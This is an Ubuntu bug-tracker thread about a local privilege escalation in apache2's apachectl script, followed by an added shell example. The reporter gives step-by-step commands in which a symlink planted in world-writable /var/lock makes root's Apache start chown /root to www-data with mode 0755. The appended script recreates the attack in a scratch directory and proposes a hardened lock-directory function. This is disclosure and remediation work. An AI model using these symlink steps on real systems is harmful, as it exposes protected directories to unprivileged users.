Comment 5 for bug 1104049

You are right. I had disabled Yama. In any case, would it be a problem for
10.04?

Thanks,
Hayawardh
On Jan 25, 2013 3:55 PM, "Marc Deslauriers" <email address hidden>
wrote:

> On Ubuntu 10.10 and later this isn't an issue because of Yama symlink
> restrictions.
> What version of Ubuntu did you try this on?
>
> https://bugs.launchpad.net/bugs/1104049
>
> Title:
> /usr/sbin/apachectl privilege escalation
>
> Status in “apache2” package in Ubuntu:
> Confirmed
>
> Bug description:
> Dear all,
>
> The /usr/sbin/apachectl script allows unprivileged local users to
> change the permissions of any directory to 0755 and in addition make
> the user www-data its owner.
>
> The script has a line:
>
> start)
> ...
> install -d -o ${APACHE_RUN_USER:-www-data}
> ${APACHE_LOCK_DIR:-/var/lock/apache2}
>
> Since in Ubuntu the /var/lock directory has world-writable permissions,
> a user can create a symbolic link to any directory. An administrator then
> starts Apache through /etc/init.d/apache2, which in turn calls the script
> /usr/sbin/apachectl which will change the permissions of the directory
> pointed to by the symbolic link to 0755 and in addition, make the user
> www-data its owner.
>
> Details:
> =====
> root@u32d:~# apt-cache policy apache2.2-common
> apache2.2-common:
> Installed: 2.2.22-1ubuntu1
> Candidate: 2.2.22-1ubuntu1.2
> Version table:
> 2.2.22-1ubuntu1.2 0
> 500 http://us.archive.ubuntu.com/ubuntu/ precise-updates/main
> i386 Packages
> 500 http://security.ubuntu.com/ubuntu/ precise-security/main
> i386 Packages
> *** 2.2.22-1ubuntu1 0
> 500 http://us.archive.ubuntu.com/ubuntu/ precise/main i386
> Packages
> 100 /var/lib/dpkg/status
>
> root@u32d:~# lsb_release -rd
> Description: Ubuntu 12.04 LTS
> Release: 12.04
>
> Steps to reproduce vulnerability on Ubuntu 12.04 LTS (also applicable
> to Quantal 12.10):
>
> As an untrusted user, create a symbolic link in /var/lock to a
> directory the user does not have read/search permission (e.g., /root):
>
> hayawardh@u32d:~$ ls -ld /root
> drwx------. 14 root root 4096 Jan 24 08:23 /root
>
> hayawardh@u32d:~$ cd /var/lock
> hayawardh@u32d:/var/lock$ ln -s /root apache2
>
> Wait for the administrator to start Apache
>
> root@u32d:~# /etc/init.d/apache2 start
> * Starting web server apache2
> apache2: Could not reliably determine the server's fully qualified
> domain name, using 127.0.1.1 for ServerName
> ...done.
>
> Now check permissions of /root:
> root@u32d:~# ls -ld /root
> drwxr-xr-x. 14 www-data root 4096 Jan 24 08:23 /root
>
> Fixing this does not seem straightforward because install opens the
> file to change permissions (in this case, /var/lock/apache2) without
> O_NOFOLLOW, and there does not seem to be a command line switch for
> the same.
>
> Portion of strace output for install -d -o ${APACHE_RUN_USER:-www-
> data} ${APACHE_LOCK_DIR:-/var/lock/apache2}
>
> mkdir("/var", 0755) = -1 EEXIST (File exists)
> chdir("/var") = 0
> mkdir("lock", 0755) = -1 EEXIST (File exists)
> chdir("lock") = 0
> mkdir("apache2", 0700) = -1 EEXIST (File exists)
> open("apache2", O_RDONLY|O_NOCTTY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 3
> fstat64(3, {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
> fchown32(3, 33, -1) = 0
> fchmod(3, 0755) = 0
> close(3) = 0
>
> Thanks,
> Hayawardh
>
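The following is an added example, not code from the bug report, the apache2 package or Ubuntu: it reproduces the symlink problem described above in a scratch directory as an unprivileged user, and places next to it a hardened replacement for the apachectl line `install -d -o ${APACHE_RUN_USER:-www-data} ${APACHE_LOCK_DIR:-/var/lock/apache2}`. The function names, the scratch layout and the choice of mkdir-then-chown are this example's own assumptions. Because every file in the scratch tree is owned by the same user, the Yama / fs.protected_symlinks restriction mentioned in the thread does not intervene, and `-o` is left off because chown to another user needs root and is not needed to show the permission change.

```sh
#!/bin/sh
# Added example (not from the bug report or the apache2 package).
# Shows the symlink problem from the report in a scratch directory and a
# hardened replacement for the apachectl line
#   install -d -o ${APACHE_RUN_USER:-www-data} ${APACHE_LOCK_DIR:-/var/lock/apache2}
# Function names and the scratch layout are this example's own assumptions.

# ensure_lock_dir DIR OWNER
# Hardened replacement. mkdir(2) never follows a symlink and fails with EEXIST
# when anything already occupies the path, so ownership and mode are applied
# only to a directory this function created itself. Anything pre-existing must
# be a plain directory (not a symlink); otherwise refuse rather than touch
# whatever the link points at.
ensure_lock_dir() {
    dir=$1
    owner=$2
    if mkdir -m 0755 "$dir" 2>/dev/null; then
        chown "$owner" "$dir" || return 1   # only on the directory we just made
        return 0
    fi
    # -L is tested before -d: -d follows symlinks and would answer "yes" for a
    # link to /root.
    if [ -L "$dir" ] || [ ! -d "$dir" ]; then
        echo "refusing to use $dir: it is not a plain directory" >&2
        return 1
    fi
    return 0
}

# demo_symlink_attack
# Stages a private directory (stands in for /root) and a world-writable sticky
# lock directory (stands in for /var/lock), plants the attacker's symlink, then
# runs the hardened function followed by the original install -d. Prints three
# fields: <hardened exit status> <target mode after hardened> <target mode after install -d>.
# Everything is owned by the same user, so fs.protected_symlinks (the Yama
# symlink restriction from the thread) does not intervene; -o is omitted because
# chown to another user needs root and is not needed to show the mode change.
demo_symlink_attack() {
    scratch=$(mktemp -d)
    mkdir -m 0700 "$scratch/secret"
    mkdir -m 1777 "$scratch/lock"
    ln -s "$scratch/secret" "$scratch/lock/apache2"       # the attacker's step

    if ensure_lock_dir "$scratch/lock/apache2" "$(id -un)"; then
        hardened_rc=0
    else
        hardened_rc=1
    fi
    mode_after_hardened=$(stat -c %a "$scratch/secret")

    # The apachectl line (minus -o). With the coreutils traced in the report
    # this follows the link and chmods "secret" to 755; a newer coreutils may
    # refuse instead, so the third field just reports what happened here.
    install -d "$scratch/lock/apache2" 2>/dev/null || true
    mode_after_install=$(stat -c %a "$scratch/secret")

    rm -rf "$scratch"
    echo "$hardened_rc $mode_after_hardened $mode_after_install"
}
```

Run `demo_symlink_attack` as an ordinary user: the first two fields are always `1 700` (the hardened function refuses the symlink and the private directory keeps its mode), while the third field shows whether the installed coreutils still follows the link the way the strace in the report does. The design point is that the hardened function never applies chown or chmod to a path it did not create in the same call, which removes the window in which a planted symlink can redirect those operations.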